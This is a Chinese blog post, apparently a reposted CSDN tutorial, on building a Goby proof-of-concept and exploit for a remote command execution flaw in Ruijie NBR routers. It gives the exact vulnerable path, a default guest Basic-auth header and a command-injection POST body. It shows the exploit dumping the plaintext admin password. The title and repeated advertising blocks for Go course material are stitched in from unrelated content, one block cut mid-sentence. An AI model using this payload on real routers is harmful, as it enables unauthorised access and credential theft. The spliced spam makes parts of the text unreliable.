2024年最新Goby自定义漏洞之EXP_goby写poc,2024年最新oppoGolang面试

于 2024-05-11 15:27:47 发布
阅读量882 收藏 5
点赞数 10
分类专栏: 程序员 文章标签: go 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84919801/article/details/138717625
版权

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以戳这里获取

在这里插入图片描述
用guest账户登录完是这样子的,左侧菜单栏都木有的!

在这里插入图片描述
修改完cookie刷新之后是这样子的,左侧菜单栏都出现了:

在这里插入图片描述
在登录处进行抓包,可以看到登陆的时候发送的post请求,基于http basic认证,并且发送command命令show clock:

在这里插入图片描述
如果是没有认证,执行这个命令是不会有结果的,如下图:

在这里插入图片描述

2.2 POC关键参数

漏洞URL

/WEB_VMS/LEVEL15/

Header部分

Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

Data部分

command=show clock&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.

还有一些可以执行的命令:

查看配置

show run

查看LAN和WAN口

show sys-mod

查看用户等等


show webmaster users

2.3 POC编写

首先,路由器的goby规则是app=“Ruijie-NBR-Router”,完成这两个必填项即可。

在这里插入图片描述
下一步,测试部分的四个必填项。漏洞简介里面咱们已经知道了这四项参数,逐一添加进去。

在这里插入图片描述
剩下就是响应测试部分的填写了,一个判断存在漏洞的部分,在漏洞简介里面截图,可以看到响应的部分,找一个比较唯一的准确的关键参数作为存在漏洞的标识,然后保存。

在这里插入图片描述
POC部分就写好了!其实EXP部分也就完成80%了。

2.4 EXP编写

首先,找到刚才编写的POC自动生成的JSON文件。

路径:\goby-win-x64-1.8.202\golib\exploits\user

在这里插入图片描述
打开json文件?没错,因为UI里没有地方写,咱们只能在json里写了!
在Scanstep上面添加语句:

在这里插入图片描述
其实这部分,要是细心的小伙伴就能发现Goby和FOFA写EXP是一个样子的。

在这里插入图片描述
所以接下来,和FOFA一样有个ExploitSteps部分,但是goby相对于FOFA来说好写的很多,只需要将Scanstep部分复制下来即可,这就是说为什么写完PoC部分相当于完成EXP的80%了,然后添加output|lastbody把响应的body展示出来,OK了。
在这里插入图片描述
看一下结果,show webmaster users看的是账号的明文密码,ruijie@2017

在这里插入图片描述

结果是支持正则匹配,但是因为还不算完善,不能做多个匹配,这里就直接显示admin的密码就好了:

在这里插入图片描述
效果如下图,这次看起来比较清爽了!(考考你们中文那部分加在哪里拉?)

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以戳这里获取

上Go语言开发知识点,真正体系化!**

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以戳这里获取

2401_84919801
关注
专栏目录
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1838
也快到护网的时间了,每的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
goby/xray批量导入自定义poc(附2024红队POC
最新发布
qq_59468567的博客
09-09 1881
找到include_poc参数,修改为include_poc: [poc-xray/*]xray批量导入自定义POC(附2024最新xrayPOC)直接把poc解压到xray.exe同一目录下。然后修改config.yaml文件。然后启动xray看效果。在这个路径下解压poc
如何编合格的 PoC 领取 Goby 红队专版
m0_46699477的博客
04-16 3767
前言: Goby已经上了某榜(滑稽)的top10了,足以证明Goby的实用性,众所周知Goby还分为内测版、超级内测版、红队专版等等,其中最强大的莫过于红队专版,但红队版的获取是严格限制的,当然也是有获取方法,这里分享如何通过编 PoC 获取红队专版。 0x001 准备环境 GobyPoC提交测试方便发布了…姑且叫PoC版。PoC版主要功能为登录后,可以在线提交 PoC,无需再提交到邮箱。 然后还有两个连接,一个是《Goby漏洞指南》: https://github.com/gobysec/.
Goby 最全最新POC共计448个
08-30
Goby 最全最新POC共计448个 包含了致远OA A6 用户敏感信息泄露、Apache_Druid_Log4shell_CVE_2021_44228、Apache_JSPWiki_Log4shell_CVE-2021-44228、VMware_NSX_Log4shell_CVE_2021_44228、VMware_vCenter_Log4shell_CVE_2021_44228_1、Wayos AC集中管理系统默认弱口令 CNVD-2021-00876、Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109、XXL-JOB 任务调度中心 后台默认弱口令、帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757、锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞、蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313、Oracle_Weblogic_SearchPublicRegistries.jsp_SSRF_CVE_2014_4210、Micro_module_monitoring_system_User_list.php_
Goby自定义漏洞EXP
m0_46699477的博客
11-06 5862
前言:自定义漏洞配合EXP,提高漏洞的利用速度,简直是爽的飞起!自从HVV的时候Goby发布HVV专版,羡慕死了,就是太菜没傍上红方大佬的腿。虽然最终用上了HVV专版,但是一些只有你自己知道的漏洞,或者比较偏门的漏洞,就需要咱们自己来编PoC或者是EXP。因为Goby没有开源,所以也能编一些基于http命令执行的漏洞!特别感谢Goby的大佬——帅帅的涛哥支持 0x001 最终效果 直接获取明文密码,点击验证。 0x001 编流程 我在《自定义PoC对接插件》一文中已经介绍过了如何编自定义P..
Goby-poc 161个
07-05
Goby自定义poc
CVE-2021-41773 goby exp
不光要学,知识要能说出口
10-28 270
CVE-2021-41773 goby exp代码 代码 { "Name": "Apache HTTP Server Arbitrary File Read(CVE-2021-41773)", "Level": "2", "Tags": [ "fileread" ], "GobyQuery": "server=\"Apache/2.4.49\"||product=\"Apache-Web-Server\"||server=\
什么是EXP漏洞
qq_44833342的博客
05-29 940
EXP漏洞概念
goby poc or exp,分享goby最新网络安全漏洞检测或利用代码.zip
04-22
goby poc or exp:深度剖析网络安全漏洞与利用代码》 在网络安全领域,发现和利用漏洞是防御与攻击双方的博弈焦点。"goby poc or exp"是指针对goby平台的漏洞证明概念(Proof of Concept, PoC)或攻击exploit,这...
Goby红队版-win-x64-2.4.7版本
07-27
Goby红队专版:集成1500个pocexp ,覆盖普通版本所有功能,开箱即用 使用方式: 解压后双击goby.exe运行即可 注意事项: 最新漏洞不可以在线更新,可自行添加pocexp 重要的事情说三遍 不要用于非法或未授权...
红队版Goby-poc438个自定义goby-poc
08-10
包含438个自定义goby-poc,可能会有重复自行判断,来源于网络收集的Goby&POC,实时更新。 如果无红队版,可直接poc管理处导入自定义poc即可,共计736个。
GobyVuls:利用漏洞支持Goby漏洞
05-03
虾虎鱼 Goby的得到了利用的支持。 此文件夹包含各种与goby一起使用的漏洞利用程序。 运行探索 从下载goby并运行。 扫描可能存在该漏洞的ip 点击“验证”按钮 执行诸如执行cmd之类的操作,或获取反向shell 贡献 鼓励并欢迎对此项目的请求和贡献! goby项目始终需要新的漏洞,并且需要有才华的开发人员(例如您自己!)在现有演示崩溃时提交修补程序。 下载 您可以转到官方网站下载 。
常见Exp漏洞POC集合
01-21
该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流shulanyy@gmail.com,作为爱好他是免费的。
Go-采用Go编的跨平台PoC勒索软件
08-13
采用Go编的跨平台PoC勒索软件
Goby POC,1275个,自己在网络上收集的,基本是网上能找到的最全的了
07-24
我自己在网络上收集的GobyPOC,导出后是1275个,列表如下,列表不全的,有兴趣的话,自己下载下来研究一下吧,最近我又想着自己去一些POC供给大家用,暂时没有时间和动力,再等一段时间的吧。 TamronOS_IPTV_RCE.json TamronOS_IPTV_system_Filedownload_CNVD_2021_45711.json TamronOS_IPTV_system_RCE.json Tenda-AC15-1900-telnet-║≤├┼.json Tenda-AC15-1900-telnet-后门.json Terramaster-F4-210-Arbitrary-File-Read.json Terramaster-F4-210-Arbitrary-User-Add.json Terramaster-F4-210-name-RCE.json TerraMaster-TOS-Information-Disclosure-(CVE-2020-28185).json TerraMaster-TOS-RCE-(CVE-2020-15568).json
Penetration_Testing_POC-About 渗透测试有关的POCEXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5545
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
漏洞研究》Apache Log4j2 远程代码执行漏洞_apache log4j2远程代码执行漏洞
2301_76225520的博客
04-18 1063
以及 LDAP即轻量级目录访问协议都是名称服务,不同的是 LDAP是一个协议,是和 HTTP 一样是通用的,而不止局限于 JAVA.比如用户对象可以有用户名、密码、邮件地址、角色等属性,计算机对象可以有IP地址、MAC地址、操作系统版本等属性。四个系列:< v1.14.2, < v1.13.5, < v1.12.7, < v1.11.6。而用户可以通过目录服务,针对打印机需求,根据分辨率等属性进行搜索获取符合条件的打印机对象。在名称服务中根据打印机名称获取打印机对象,并进行打印操作。
CVE-2021-26084 goby exp
不光要学,知识要能说出口
10-29 394
CVE-2021-26084 goby exp声明代码 声明 本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。 代码 { "Name": "Confluence RCE(CVE-2021-26084)", "Level": "3", "Tags": [ "RCE" ], "GobyQuery": "product=\"Confluence\"",
Goby EXP 计划试运行一月!丰厚奖金等你来拿!
m0_46699477的博客
05-25 257
随着网络安全从合规化日益趋向实战化,以前的各种大而全的扫描器漏洞库已经无法满足现在实战化的需求。实战化的网络安全环境要求漏洞库的质量高、有 Exp、效率高,这些特点是以前的漏洞库无法满足的。Goby 一直致力于做行业内高质量、实战化的 Exp 漏洞库,想要达到这个愿景,离不开国内社区庞大的力量。特发起 Goby EXP 计划,开放 EXP 专版,邀请更多白帽子共同维护网络安全生态力量! 文章看到底,找此版本的获取方式↓ 0x01 EXP 专版 1. EXP 提交入口点 方式一:登录账号 → ID 个人.
goby红队版poc
08-20
Goby红队版POC是一个专门为红队渗透测试设计的工具。红队渗透测试是指模拟攻击者的技术和策略来评估组织的网络安全防御能力,并识别潜在的漏洞和弱点。Goby红队版POC通过发现、测试和利用网络系统和应用程序中的漏洞,帮助安全团队更好地保护组织的网络。 Goby红队版POC的主要功能包括漏洞扫描、漏洞检测和漏洞利用。它可以扫描网络目标,查找可能存在的漏洞,并生成详细的报告。与传统的漏洞扫描工具不同,Goby红队版POC还具备漏洞检测的能力,可以通过发送特定的网络数据包来检测目标系统的漏洞。同时,它还提供了漏洞利用的功能,可以自动化地利用漏洞攻击目标系统,以验证漏洞的存在性,并帮助安全团队修补这些漏洞Goby红队版POC还具备一个直观的用户界面,使安全团队能够方便地管理和执行渗透测试任务。它提供了多种方式来配置和管理扫描任务,包括选择扫描目标、设置扫描选项、编自定义POC等。同时,它还支持生成漏洞报告,以便安全团队更好地识别和修补漏洞。 总之,Goby红队版POC是一款功能强大的红队渗透测试工具,能够帮助安全团队发现和利用网络系统和应用程序中的漏洞,提高组织的网络安全防御能力。它的直观用户界面和丰富的功能使得安全团队能够更加高效地管理和执行渗透测试任务,并根据测试结果采取相应的修补措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值